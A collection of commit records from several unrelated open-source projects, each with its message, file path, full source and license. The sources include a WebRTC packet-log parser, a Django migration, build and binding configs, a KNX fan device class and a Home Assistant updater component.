tensor_str = tensor_str.replace("[", "{").replace("]", "}")
str = 'float ' + tensor_name + '[] = ' + tensor_str + ';\n'
f.write(str)
## Preprocess param
with open("./transiXOR_Models/"+model_name+"_preproc_param.p", "rb") as f:
preproc_dict = pickle.load(f)
print(preproc_dict)
| mit | Python |
|
7be9e42f6c870004a5aa9b123b9f28c8f95f5b88 | Add Parser to analyse the results of the network tester. | TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc | webrtc/tools/network_tester/parse_packet_log.py | webrtc/tools/network_tester/parse_packet_log.py | # Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
# To run this script please copy "out/<build_name>/pyproto/webrtc/tools/
# network_tester/network_tester_packet_pb2.py" next to this script.
# The you can run this script with:
# "python parse_packet_log.py -f packet_log.dat"
# for more information call:
# "python parse_packet_log.py --help"
from optparse import OptionParser
import struct
import matplotlib.pyplot as plt
import network_tester_packet_pb2
def GetSize(file_to_parse):
data = file_to_parse.read(1)
if data == '':
return 0
return struct.unpack('<b', data)[0]
def ParsePacketLog(packet_log_file_to_parse):
packets = []
with open(packet_log_file_to_parse, 'rb') as file_to_parse:
while True:
size = GetSize(file_to_parse)
if size == 0:
break
try:
packet = network_tester_packet_pb2.NetworkTesterPacket()
packet.ParseFromString(file_to_parse.read(size))
packets.append(packet)
except IOError:
break
return packets
def GetTimeAxis(packets):
first_arrival_time = packets[0].arrival_timestamp
return [(packet.arrival_timestamp - first_arrival_time) / 1000000.0
for packet in packets]
def CreateSendTimeDiffPlot(packets, plot):
first_send_time_diff = (
packets[0].arrival_timestamp - packets[0].send_timestamp)
y = [(packet.arrival_timestamp - packet.send_timestamp) - first_send_time_diff
for packet in packets]
plot.grid(True)
plot.set_title("SendTime difference [us]")
plot.plot(GetTimeAxis(packets), y)
class MovingAverageBitrate(object):
def __init__(self):
self.packet_window = []
self.window_time = 1000000
self.bytes = 0
self.latest_packet_time = 0
self.send_interval = 0
def RemoveOldPackets(self):
for packet in self.packet_window:
if (self.latest_packet_time - packet.arrival_timestamp >
self.window_time):
self.bytes = self.bytes - packet.packet_size
self.packet_window.remove(packet)
def AddPacket(self, packet):
"""This functions returns bits / second"""
self.send_interval = packet.arrival_timestamp - self.latest_packet_time
self.latest_packet_time = packet.arrival_timestamp
self.RemoveOldPackets()
self.packet_window.append(packet)
self.bytes = self.bytes + packet.packet_size
return self.bytes * 8
def CreateReceiveBiratePlot(packets, plot):
bitrate = MovingAverageBitrate()
y = [bitrate.AddPacket(packet) for packet in packets]
plot.grid(True)
plot.set_title("Receive birate [bps]")
plot.plot(GetTimeAxis(packets), y)
def CreatePacketlossPlot(packets, plot):
packets_look_up = {}
first_sequence_number = packets[0].sequence_number
last_sequence_number = packets[-1].sequence_number
for packet in packets:
packets_look_up[packet.sequence_number] = packet
y = []
x = []
first_arrival_time = 0
last_arrival_time = 0
last_arrival_time_diff = 0
for sequence_number in range(first_sequence_number, last_sequence_number + 1):
if sequence_number in packets_look_up:
y.append(0)
if first_arrival_time == 0:
first_arrival_time = packets_look_up[sequence_number].arrival_timestamp
x_time = (packets_look_up[sequence_number].arrival_timestamp -
first_arrival_time)
if last_arrival_time != 0:
last_arrival_time_diff = x_time - last_arrival_time
last_arrival_time = x_time
x.append(x_time / 1000000.0)
else:
if last_arrival_time != 0 and last_arrival_time_diff != 0:
x.append((last_arrival_time + last_arrival_time_diff) / 1000000.0)
y.append(1)
plot.grid(True)
plot.set_title("Lost packets [0/1]")
plot.plot(x, y)
def main():
parser = OptionParser()
parser.add_option("-f",
"--packet_log_file",
dest="packet_log_file",
help="packet_log file to parse")
options = parser.parse_args()[0]
packets = ParsePacketLog(options.packet_log_file)
f, plots = plt.subplots(3, sharex=True)
plt.xlabel('time [sec]')
CreateSendTimeDiffPlot(packets, plots[0])
CreateReceiveBiratePlot(packets, plots[1])
CreatePacketlossPlot(packets, plots[2])
f.subplots_adjust(hspace=0.3)
plt.show()
if __name__ == "__main__":
main()
| bsd-3-clause | Python |
|
f3cab8d72b9a070305f4f2c44922e381ea091205 | add context manager example | h2non/riprova | examples/context_manager.py | examples/context_manager.py | # -*- coding: utf-8 -*-
import riprova
# Store number of function calls for error simulation
calls = 0
# Register retriable operation with custom evaluator
def mul2(x):
global calls
if calls < 4:
calls += 1
raise RuntimeError('simulated call error')
return x * 2
# Run task via context manager
with riprova.Retrier() as retry:
result = retry.run(mul2, 2)
print('Result 1: {}'.format(result))
# Or alternatively create a shared retrier and reuse it across multiple
# context managers.
retrier = riprova.Retrier()
with retrier as retry:
calls = 0
result = retry.run(mul2, 4)
print('Result 2: {}'.format(result))
with retrier as retry:
calls = 0
result = retry.run(mul2, 8)
print('Result 3: {}'.format(result))
| mit | Python |
|
24cf3c2676e4ea7342e95e6a37857c6fa687865e | Remove managers for article obj. | BirkbeckCTP/janeway,BirkbeckCTP/janeway,BirkbeckCTP/janeway,BirkbeckCTP/janeway | src/submission/migrations/0058_auto_20210812_1254.py | src/submission/migrations/0058_auto_20210812_1254.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-08-12 12:54
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('submission', '0057_merge_20210811_1506'),
]
operations = [
migrations.AlterModelManagers(
name='article',
managers=[
],
),
]
| agpl-3.0 | Python |
|
9687ca646dd7ae5a7ff31e5b8657fb1ab88a0f5e | add buildbot | steinwurf/bourne,steinwurf/bourne | buildbot.py | buildbot.py | #!/usr/bin/env python
# encoding: utf-8
import sys
import json
import subprocess
project_name = 'bourne'
def run_command(args):
print("Running: {}".format(args))
# sys.stdout.flush()
# subprocess.check_call(args)
def get_tool_options(properties):
options = []
if 'tool_options' in properties:
# Make sure that the values are correctly comma separated
for key, value in properties['tool_options'].items():
if value is None:
options += ['--{0}'.format(key)]
else:
options += ['--{0}={1}'.format(key, value)]
return options
def configure(properties):
command = [sys.executable, 'waf']
if properties.get('build_distclean'):
command += ['distclean']
command += ['configure', '--git-protocol=git@']
if 'waf_bundle_path' in properties:
command += ['--bundle-path=' + properties['waf_bundle_path']]
if 'dependency_project' in properties:
command += ['--{0}-use-checkout={1}'.format(
properties['dependency_project'],
properties['dependency_checkout'])]
command += ["--cxx_mkspec={}".format(properties['cxx_mkspec'])]
command += get_tool_options(properties)
run_command(command)
def build(properties):
command = [sys.executable, 'waf', 'build', '-v']
run_command(command)
def run_tests(properties):
command = [sys.executable, 'waf', '-v', '--run_tests']
run_cmd = '%s'
if properties.get('valgrind_run'):
run_cmd = 'valgrind --error-exitcode=1 %s --profile=embedded'
if run_cmd:
command += ["--run_cmd={}".format(run_cmd)]
command += get_tool_options(properties)
run_command(command)
def install(properties):
command = [sys.executable, 'waf', '-v', 'install']
if 'install_path' in properties:
command += ['--install_path={0}'.format(properties['install_path'])]
if properties.get('install_relative'):
command += ['--install_relative']
run_command(command)
def coverage_settings(options):
options['required_line_coverage'] = 0.0
def main():
argv = sys.argv
if len(argv) != 3:
print("Usage: {} <command> <properties>".format(argv[0]))
sys.exit(0)
cmd = argv[1]
properties = json.loads(argv[2])
if cmd == 'configure':
configure(properties)
elif cmd == 'build':
build(properties)
elif cmd == 'run_tests':
run_tests(properties)
elif cmd == 'install':
install(properties)
else:
print("Unknown command: {}".format(cmd))
if __name__ == '__main__':
main()
| bsd-3-clause | Python |
|
0f6866a91e4d8af2faedf2af277ad0df573536aa | Set win_delay_load_hook to false | atom/node-runas,dbkaplun/node-runas,dustinblackman/node-runas,dbkaplun/node-runas,dustinblackman/node-runas,pombredanne/node-runas,atom/node-runas,pombredanne/node-runas | binding.gyp | binding.gyp | {
'target_defaults': {
'win_delay_load_hook': 'false',
'conditions': [
['OS=="win"', {
'msvs_disabled_warnings': [
4530, # C++ exception handler used, but unwind semantics are not enabled
4506, # no definition for inline function
],
}],
],
},
'targets': [
{
'target_name': 'runas',
'sources': [
'src/main.cc',
],
'include_dirs': [
'<!(node -e "require(\'nan\')")'
],
'conditions': [
['OS=="win"', {
'sources': [
'src/runas_win.cc',
],
'libraries': [
'-lole32.lib',
'-lshell32.lib',
],
}],
['OS=="mac"', {
'sources': [
'src/runas_darwin.cc',
'src/fork.cc',
'src/fork.h',
],
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
],
}],
['OS not in ["mac", "win"]', {
'sources': [
'src/runas_posix.cc',
'src/fork.cc',
'src/fork.h',
],
}],
],
}
]
}
| {
'target_defaults': {
'conditions': [
['OS=="win"', {
'msvs_disabled_warnings': [
4530, # C++ exception handler used, but unwind semantics are not enabled
4506, # no definition for inline function
],
}],
],
},
'targets': [
{
'target_name': 'runas',
'sources': [
'src/main.cc',
],
'include_dirs': [
'<!(node -e "require(\'nan\')")'
],
'conditions': [
['OS=="win"', {
'sources': [
'src/runas_win.cc',
],
'libraries': [
'-lole32.lib',
'-lshell32.lib',
],
}],
['OS=="mac"', {
'sources': [
'src/runas_darwin.cc',
'src/fork.cc',
'src/fork.h',
],
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
],
}],
['OS not in ["mac", "win"]', {
'sources': [
'src/runas_posix.cc',
'src/fork.cc',
'src/fork.h',
],
}],
],
}
]
}
| mit | Python |
0d6da71cb759c3819133baa3d7c043fb92df425e | Create weibo.py | sanbaideng/GetWeiboInfoByPython | 2/weibo.py | 2/weibo.py | from bs4 import BeautifulSoup
import json
import ConfigParser
import urllib2
from util import get_content
link_id = 18
cf = ConfigParser.ConfigParser()
cf.read("config.ini")
weiyinUrl = 'http://wb.weiyin.cc/Book/BookView/W440164363452#' + str(link_id)
content = urllib2.urlopen(weiyinUrl)
html = content.read()
soup = BeautifulSoup(html)
weibo = soup.find("div",attrs="head_title").find("p").text
print html
print weibo
| mit | Python |
|
666caee40af2dccc30e78d52f8de962110408146 | Add fan device | XKNX/xknx,XKNX/xknx | xknx/devices/fan.py | xknx/devices/fan.py | """
Module for managing a fan via KNX.
It provides functionality for
* setting fan to specific speed
* reading the current speed from KNX bus.
"""
import asyncio
from .device import Device
from .remote_value_scaling import RemoteValueScaling
class Fan(Device):
"""Class for managing a fan."""
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-public-methods
def __init__(self,
xknx,
name,
group_address_speed=None,
group_address_speed_state=None,
device_updated_cb=None):
"""Initialize fan class."""
# pylint: disable=too-many-arguments
Device.__init__(self, xknx, name, device_updated_cb)
self.speed = RemoteValueScaling(
xknx,
group_address_speed,
group_address_speed_state,
device_name=self.name,
after_update_cb=self.after_update,
range_from=0,
range_to=100)
@classmethod
def from_config(cls, xknx, name, config):
"""Initialize object from configuration structure."""
group_address_speed = \
config.get('group_address_speed')
group_address_speed_state = \
config.get('group_address_speed_state')
return cls(
xknx,
name,
group_address_speed=group_address_speed,
group_address_speed_state=group_address_speed_state)
def has_group_address(self, group_address):
"""Test if device has given group address."""
return self.speed.has_group_address(group_address)
def __str__(self):
"""Return object as readable string."""
return '<Fan name="{0}" ' \
'speed="{1}" />' \
.format(
self.name,
self.speed.group_addr_str())
@asyncio.coroutine
def set_speed(self, speed):
"""Sets the fan to a desginated speed."""
yield from self.speed.set(speed)
@asyncio.coroutine
def do(self, action):
"""Execute 'do' commands."""
if action.startswith("speed:"):
yield from self.set_speed(int(action[11:]))
else:
self.xknx.logger.warning("Could not understand action %s for device %s", action, self.get_name())
def state_addresses(self):
"""Return group addresses which should be requested to sync state."""
state_addresses = []
state_addresses.extend(self.speed.state_addresses())
return state_addresses
async def process_group_write(self, telegram):
"""Process incoming GROUP WRITE telegram."""
await self.speed.process(telegram)
def current_speed(self):
"""Return current speed of fan."""
return self.speed.value
def __eq__(self, other):
"""Equal operator."""
return self.__dict__ == other.__dict__
| mit | Python |
|
eefa144b7a01f6beee1fcba30af32a967598d44f | add tests | sxslex/tabela_fipe,sxslex/tabela_fipe | tests/test_tabela_fipe.py | tests/test_tabela_fipe.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Alexandre Villela (SleX) <https://github.com/sxslex/sxtools/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# by sx.slex@gmail.com
from TabelaFipe import TabelaFipe
import unittest
# import pprint
class TestTabelaFipe(unittest.TestCase):
def test_01_get_by_codefipe(self):
tb = TabelaFipe()
resp = tb.get_by_codefipe('006008-9')
# pprint.pprint(resp)
self.assertIsInstance(resp, dict)
def test_02_get_by_codefipe_not_exists(self):
tb = TabelaFipe()
resp = tb.get_by_codefipe('111111-1')
# pprint.pprint(resp)
self.assertIsNone(resp)
| apache-2.0 | Python |
|
a467cf8e92a783112bcecc82acf7b33c31282c49 | Bump to 3.2.0.rc2 | jsma/django-cms,nimbis/django-cms,netzkolchose/django-cms,FinalAngel/django-cms,iddqd1/django-cms,FinalAngel/django-cms,mkoistinen/django-cms,netzkolchose/django-cms,keimlink/django-cms,nimbis/django-cms,rsalmaso/django-cms,timgraham/django-cms,dhorelik/django-cms,yakky/django-cms,datakortet/django-cms,vxsx/django-cms,vxsx/django-cms,dhorelik/django-cms,dhorelik/django-cms,bittner/django-cms,jproffitt/django-cms,vxsx/django-cms,datakortet/django-cms,evildmp/django-cms,yakky/django-cms,jsma/django-cms,divio/django-cms,benzkji/django-cms,jsma/django-cms,divio/django-cms,datakortet/django-cms,bittner/django-cms,rsalmaso/django-cms,vxsx/django-cms,bittner/django-cms,mkoistinen/django-cms,czpython/django-cms,evildmp/django-cms,keimlink/django-cms,netzkolchose/django-cms,jproffitt/django-cms,benzkji/django-cms,czpython/django-cms,jproffitt/django-cms,SachaMPS/django-cms,benzkji/django-cms,SachaMPS/django-cms,iddqd1/django-cms,evildmp/django-cms,rsalmaso/django-cms,bittner/django-cms,evildmp/django-cms,timgraham/django-cms,netzkolchose/django-cms,timgraham/django-cms,nimbis/django-cms,czpython/django-cms,mkoistinen/django-cms,nimbis/django-cms,datakortet/django-cms,rsalmaso/django-cms,czpython/django-cms,benzkji/django-cms,iddqd1/django-cms,SachaMPS/django-cms,FinalAngel/django-cms,keimlink/django-cms,mkoistinen/django-cms,divio/django-cms,FinalAngel/django-cms,yakky/django-cms,jsma/django-cms,yakky/django-cms,divio/django-cms,jproffitt/django-cms | cms/__init__.py | cms/__init__.py | # -*- coding: utf-8 -*-
__version__ = '3.2.0.rc2'
default_app_config = 'cms.apps.CMSConfig'
| # -*- coding: utf-8 -*-
__version__ = '3.2.0.dev4'
default_app_config = 'cms.apps.CMSConfig'
| bsd-3-clause | Python |
68a7f9faf1933bb224113d9fa5d0ddd362b2e5ea | Add script to generate the site documentation containing the sizes of the binary shellcodes. | computerline1z/win-exec-calc-shellcode,computerline1z/win-exec-calc-shellcode,ohio813/win-exec-calc-shellcode,ohio813/win-exec-calc-shellcode | SizeDocGenerator.py | SizeDocGenerator.py | import os, re;
# I got the actual size of the binary code wrong on the site once - this script should help prevent that.
dsDoc_by_sArch = {"w32": "x86", "w64": "x64", "win": "x86+x64"};
with open("build_info.txt", "rb") as oFile:
iBuildNumber = int(re.search(r"build number\: (\d+)", oFile.read(), re.M).group(1));
print "Sizes (build %d)" % iBuildNumber;
for sArch in sorted(dsDoc_by_sArch.keys()):
sDoc = dsDoc_by_sArch[sArch];
iBinSize = os.path.getsize(r"build\bin\%s-exec-calc-shellcode.bin" % sArch);
iBinESPSize = os.path.getsize(r"build\bin\%s-exec-calc-shellcode-esp.bin" % sArch);
print " * %s: %d bytes (%d with stack allignment)" % (sDoc, iBinSize, iBinESPSize);
| bsd-3-clause | Python |
|
d59b7d8ea46d86169ffc9423de0a88b9c7c64774 | Create BalanceData.py | vidhyal/WitchMusic | Scikit/BalanceData.py | Scikit/BalanceData.py | #Copyright (c) 2016 Vidhya, Nandini
import os
import numpy as np
import operator
from constants import *
FIX_DEV = 0.00000001
rootdir = os.getcwd()
newdir = os.path.join(rootdir,'featurefiles')
def LoadData():
data_file = open(os.path.join(newdir,'out_2.txt'),'r')
unprocessed_data = data_file.readlines()
labels ={}
features ={}
for line in unprocessed_data:
feature_vector = []
split_line = line.split(' ')
for element in split_line[1:-1]:
feature_vector.append(float(element))
track_id = split_line[0]
features[track_id] = feature_vector
data_file.close()
label_file = open(os.path.join(newdir,'labelout.txt'),'r')
label_data = label_file.readlines()
for line in label_data:
split_line = line.split('\t')
track_id = split_line[0]
#print (track_id)
if track_id in features:
labels[split_line[0]] = split_line[1].split('\n')[0]
label_file.close()
for key in features:
feature = features[key]
label = labels[key]
# print feature, label
return features, labels
def writeToFile(key,feature,fp):
fp1 = open(fp,'a')
line = key
for s in feature:
line+= " %f" %float(s)
line+="\n"
fp1.write(line)
def BalanceData(features, labels):
if not os.path.exists('train'):
os.makedirs('train')
traindir = os.path.join(rootdir,'train')
if not os.path.exists('test'):
os.makedirs('test')
testdir = os.path.join(rootdir,'test')
count =0
testFile = open(os.path.join(testdir,'testFile'),'w+')
genreFeat={}
numList ={}
testFeat = {}
trainFeat ={}
genreTestFeat ={}
for genre in genres:
str1 = genre+'.txt'
fout = open(os.path.join(traindir,str1),'w+')
#print fout
delKey =[]
feature_list =[]
test_list =[]
subcount=0
for key in features:
if labels[key] == genre:
delKey.append(key)
subcount=subcount+1
fout.close()
count = count+ subcount
numList[genre] = subcount/2
if subcount != 0:
for key in delKey[:subcount/2]:
trainFeat[key] = features[key]
trainFeat[key].append(key)
feature_list.append(trainFeat[key])
#writeToFile(key, features[key], os.path.join(traindir,str1))
genreFeat[genre] = feature_list
for key in delKey[subcount/2:]:
testFeat[key] = features[key]
testFeat[key].append(key)
test_list.append(testFeat[key])
#writeToFile(key,features[key], os.path.join(testdir,'testFile'))
genreTestFeat[genre] = test_list
for key in delKey:
del features[key]
return genreFeat, numList, count, genreTestFeat
def ConvertToArrays(feats):
features =[]
labels = []
keys = []
for genre in feats:
#print genre
for f in feats[genre]:
features.append(f[:-1])
keys.append(f[-1])
#print features
#input("press enter")
labels.append(genre)
return np.asarray(features), np.asarray(labels), np.asarray(keys)
def GetData():
features, labels =LoadData()
genreFeat,countGenre, count, genreTestFeat = BalanceData(features, labels)
train_features, train_labels, train_keys = ConvertToArrays(genreFeat)
test_features, test_labels, test_keys = ConvertToArrays(genreTestFeat)
return train_features, train_labels, test_features, test_labels, test_keys
| mit | Python |
|
45b77de143a6ffcc46091d7879da4fa3009bc3e0 | add jm client | Zex/juicemachine,Zex/juicemachine,Zex/juicemachine | python/jm_client.py | python/jm_client.py | #!/usr/bin/python
#
# jm_client.py
#
# Author: Zex <top_zlynch@yahoo.com>
#
import dbus
import dbus.service
import dbus.mainloop.glib
import gobject
from basic import *
def start_request():
"""
Start sending requests to server
"""
connection = dbus.SessionBus()
obj = connection.get_object(
JM_SERVICE_NAME,
JM_CONFIG_PATH)
conf_iface = dbus.Interface(obj,
JM_CONFIG_IFACE)
print obj.Introspect()
print conf_iface.list()
start_request()
| mit | Python |
|
4ea6def1bdeb332b1f530f359a333e4f95078b2b | Update docstrings and link to docs | xifle/home-assistant,hmronline/home-assistant,jnewland/home-assistant,florianholzapfel/home-assistant,betrisey/home-assistant,badele/home-assistant,tinloaf/home-assistant,miniconfig/home-assistant,aoakeson/home-assistant,florianholzapfel/home-assistant,justyns/home-assistant,nkgilley/home-assistant,ct-23/home-assistant,alexmogavero/home-assistant,leppa/home-assistant,coteyr/home-assistant,JshWright/home-assistant,JshWright/home-assistant,GenericStudent/home-assistant,turbokongen/home-assistant,varunr047/homefile,HydrelioxGitHub/home-assistant,caiuspb/home-assistant,aoakeson/home-assistant,LinuxChristian/home-assistant,robbiet480/home-assistant,w1ll1am23/home-assistant,Smart-Torvy/torvy-home-assistant,keerts/home-assistant,tboyce1/home-assistant,hexxter/home-assistant,mKeRix/home-assistant,miniconfig/home-assistant,auduny/home-assistant,stefan-jonasson/home-assistant,sfam/home-assistant,dmeulen/home-assistant,nkgilley/home-assistant,mikaelboman/home-assistant,morphis/home-assistant,coteyr/home-assistant,Zyell/home-assistant,deisi/home-assistant,Zac-HD/home-assistant,open-homeautomation/home-assistant,nugget/home-assistant,srcLurker/home-assistant,MungoRae/home-assistant,LinuxChristian/home-assistant,sfam/home-assistant,PetePriority/home-assistant,philipbl/home-assistant,tboyce1/home-assistant,luxus/home-assistant,hexxter/home-assistant,jaharkes/home-assistant,HydrelioxGitHub/home-assistant,hmronline/home-assistant,shaftoe/home-assistant,open-homeautomation/home-assistant,tchellomello/home-assistant,jawilson/home-assistant,DavidLP/home-assistant,joopert/home-assistant,titilambert/home-assistant,balloob/home-assistant,partofthething/home-assistant,MungoRae/home-assistant,joopert/home-assistant,MungoRae/home-assistant,Duoxilian/home-assistant,stefan-jonasson/home-assistant,varunr047/homefile,srcLurker/home-assistant,molobrakos/home-assistant,adrienbrault/home-assistant,mezz64/home-assistant,emilhetty/home-assistant,Theb-1/home-assistant,sffjunkie/home-assistant,stefan-jonasson/home-assistant,partofthething/home-assistant,MartinHjelmare/home-assistant,nevercast/home-assistant,GenericStudent/home-assistant,Theb-1/home-assistant,pschmitt/home-assistant,LinuxChristian/home-assistant,mezz64/home-assistant,luxus/home-assistant,emilhetty/home-assistant,happyleavesaoc/home-assistant,keerts/home-assistant,persandstrom/home-assistant,bdfoster/blumate,leoc/home-assistant,mKeRix/home-assistant,auduny/home-assistant,philipbl/home-assistant,nugget/home-assistant,ma314smith/home-assistant,instantchow/home-assistant,shaftoe/home-assistant,ma314smith/home-assistant,aronsky/home-assistant,aoakeson/home-assistant,aequitas/home-assistant,eagleamon/home-assistant,oandrew/home-assistant,Julian/home-assistant,Danielhiversen/home-assistant,Duoxilian/home-assistant,xifle/home-assistant,jaharkes/home-assistant,Zyell/home-assistant,alexmogavero/home-assistant,ewandor/home-assistant,varunr047/homefile,morphis/home-assistant,postlund/home-assistant,lukas-hetzenecker/home-assistant,Zac-HD/home-assistant,justyns/home-assistant,devdelay/home-assistant,ma314smith/home-assistant,sffjunkie/home-assistant,nnic/home-assistant,jabesq/home-assistant,aequitas/home-assistant,robjohnson189/home-assistant,eagleamon/home-assistant,tboyce1/home-assistant,varunr047/homefile,emilhetty/home-assistant,badele/home-assistant,bdfoster/blumate,oandrew/home-assistant,hmronline/home-assistant,alexmogavero/home-assistant,adrienbrault/home-assistant,tchellomello/home-assistant,jaharkes/home-assistant,rohitranjan1991/home-assistant,persandstrom/home-assistant,happyleavesaoc/home-assistant,turbokongen/home-assistant,sdague/home-assistant,mikaelboman/home-assistant,molobrakos/home-assistant,leoc/home-assistant,kyvinh/home-assistant,LinuxChristian/home-assistant,Smart-Torvy/torvy-home-assistant,bdfoster/blumate,FreekingDean/home-assistant,morphis/home-assistant,morphis/home-assistant,HydrelioxGitHub/home-assistant,oandrew/home-assistant,eagleamon/home-assistant,DavidLP/home-assistant,LinuxChristian/home-assistant,deisi/home-assistant,jamespcole/home-assistant,nevercast/home-assistant,devdelay/home-assistant,ct-23/home-assistant,Zac-HD/home-assistant,ma314smith/home-assistant,Duoxilian/home-assistant,aequitas/home-assistant,PetePriority/home-assistant,deisi/home-assistant,Cinntax/home-assistant,fbradyirl/home-assistant,Julian/home-assistant,Cinntax/home-assistant,auduny/home-assistant,mikaelboman/home-assistant,devdelay/home-assistant,Theb-1/home-assistant,hexxter/home-assistant,aronsky/home-assistant,sfam/home-assistant,instantchow/home-assistant,MartinHjelmare/home-assistant,PetePriority/home-assistant,caiuspb/home-assistant,rohitranjan1991/home-assistant,keerts/home-assistant,w1ll1am23/home-assistant,devdelay/home-assistant,shaftoe/home-assistant,miniconfig/home-assistant,MartinHjelmare/home-assistant,badele/home-assistant,robjohnson189/home-assistant,ct-23/home-assistant,emilhetty/home-assistant,tinloaf/home-assistant,qedi-r/home-assistant,eagleamon/home-assistant,leoc/home-assistant,MungoRae/home-assistant,open-homeautomation/home-assistant,persandstrom/home-assistant,deisi/home-assistant,lukas-hetzenecker/home-assistant,home-assistant/home-assistant,kyvinh/home-assistant,Zyell/home-assistant,mikaelboman/home-assistant,florianholzapfel/home-assistant,DavidLP/home-assistant,deisi/home-assistant,keerts/home-assistant,varunr047/homefile,mikaelboman/home-assistant,robbiet480/home-assistant,robjohnson189/home-assistant,kennedyshead/home-assistant,soldag/home-assistant,betrisey/home-assistant,tboyce021/home-assistant,robjohnson189/home-assistant,JshWright/home-assistant,luxus/home-assistant,kyvinh/home-assistant,Zac-HD/home-assistant,Duoxilian/home-assistant,srcLurker/home-assistant,jaharkes/home-assistant,qedi-r/home-assistant,betrisey/home-assistant,JshWright/home-assistant,ewandor/home-assistant,mKeRix/home-assistant,justyns/home-assistant,sffjunkie/home-assistant,dmeulen/home-assistant,sffjunkie/home-assistant,MungoRae/home-assistant,kyvinh/home-assistant,sander76/home-assistant,shaftoe/home-assistant,sdague/home-assistant,balloob/home-assistant,betrisey/home-assistant,FreekingDean/home-assistant,tboyce021/home-assistant,Julian/home-assistant,jnewland/home-assistant,open-homeautomation/home-assistant,dmeulen/home-assistant,xifle/home-assistant,jnewland/home-assistant,philipbl/home-assistant,jamespcole/home-assistant,alexmogavero/home-assistant,florianholzapfel/home-assistant,kennedyshead/home-assistant,happyleavesaoc/home-assistant,fbradyirl/home-assistant,mKeRix/home-assistant,titilambert/home-assistant,sander76/home-assistant,bdfoster/blumate,xifle/home-assistant,Smart-Torvy/torvy-home-assistant,hexxter/home-assistant,toddeye/home-assistant,srcLurker/home-assistant,leoc/home-assistant,molobrakos/home-assistant,soldag/home-assistant,stefan-jonasson/home-assistant,tboyce1/home-assistant,Julian/home-assistant,miniconfig/home-assistant,caiuspb/home-assistant,Danielhiversen/home-assistant,bdfoster/blumate,ct-23/home-assistant,jamespcole/home-assistant,dmeulen/home-assistant,nnic/home-assistant,home-assistant/home-assistant,emilhetty/home-assistant,tinloaf/home-assistant,balloob/home-assistant,happyleavesaoc/home-assistant,jabesq/home-assistant,nnic/home-assistant,toddeye/home-assistant,Smart-Torvy/torvy-home-assistant,pschmitt/home-assistant,coteyr/home-assistant,Teagan42/home-assistant,jabesq/home-assistant,jawilson/home-assistant,ewandor/home-assistant,leppa/home-assistant,rohitranjan1991/home-assistant,hmronline/home-assistant,ct-23/home-assistant,instantchow/home-assistant,nevercast/home-assistant,sffjunkie/home-assistant,Teagan42/home-assistant,postlund/home-assistant,philipbl/home-assistant,hmronline/home-assistant,oandrew/home-assistant,nugget/home-assistant,fbradyirl/home-assistant | homeassistant/components/updater.py | homeassistant/components/updater.py | """
homeassistant.components.updater
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Component that checks for available updates.
For more details about this platform, please refer to the documentation at
at https://home-assistant.io/components/updater/
"""
import logging
import requests
from homeassistant.const import __version__ as CURRENT_VERSION
from homeassistant.const import ATTR_FRIENDLY_NAME
from homeassistant.helpers import event
_LOGGER = logging.getLogger(__name__)
PYPI_URL = 'https://pypi.python.org/pypi/homeassistant/json'
DEPENDENCIES = []
DOMAIN = 'updater'
ENTITY_ID = 'updater.updater'
def setup(hass, config):
""" Setup the updater component. """
def check_newest_version(_=None):
""" Check if a new version is available and report if one is. """
newest = get_newest_version()
if newest != CURRENT_VERSION and newest is not None:
hass.states.set(
ENTITY_ID, newest, {ATTR_FRIENDLY_NAME: 'Update Available'})
event.track_time_change(hass, check_newest_version,
hour=[0, 12], minute=0, second=0)
check_newest_version()
return True
def get_newest_version():
""" Get the newest Home Assistant version from PyPI. """
try:
req = requests.get(PYPI_URL)
return req.json()['info']['version']
except requests.RequestException:
_LOGGER.exception('Could not contact PyPI to check for updates')
return
except ValueError:
_LOGGER.exception('Received invalid response from PyPI')
return
except KeyError:
_LOGGER.exception('Response from PyPI did not include version')
return
| """
homeassistant.components.sensor.updater
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sensor that checks for available updates.
For more details about this platform, please refer to the documentation at
at https://home-assistant.io/components/sensor.updater/
"""
import logging
import requests
from homeassistant.const import __version__ as CURRENT_VERSION
from homeassistant.const import ATTR_FRIENDLY_NAME
from homeassistant.helpers import event
_LOGGER = logging.getLogger(__name__)
PYPI_URL = 'https://pypi.python.org/pypi/homeassistant/json'
DEPENDENCIES = []
DOMAIN = 'updater'
ENTITY_ID = 'updater.updater'
def setup(hass, config):
''' setup the updater component '''
def check_newest_version(_=None):
''' check if a new version is available and report if one is '''
newest = get_newest_version()
if newest != CURRENT_VERSION and newest is not None:
hass.states.set(
ENTITY_ID, newest, {ATTR_FRIENDLY_NAME: 'Update Available'})
event.track_time_change(hass, check_newest_version,
hour=[0, 12], minute=0, second=0)
check_newest_version()
return True
def get_newest_version():
''' Get the newest HA version form PyPI '''
try:
req = requests.get(PYPI_URL)
return req.json()['info']['version']
except requests.RequestException:
_LOGGER.exception('Could not contact PyPI to check for updates')
return
except ValueError:
_LOGGER.exception('Received invalid response from PyPI')
return
except KeyError:
_LOGGER.exception('Response from PyPI did not include version')
return
| apache-2.0 | Python |
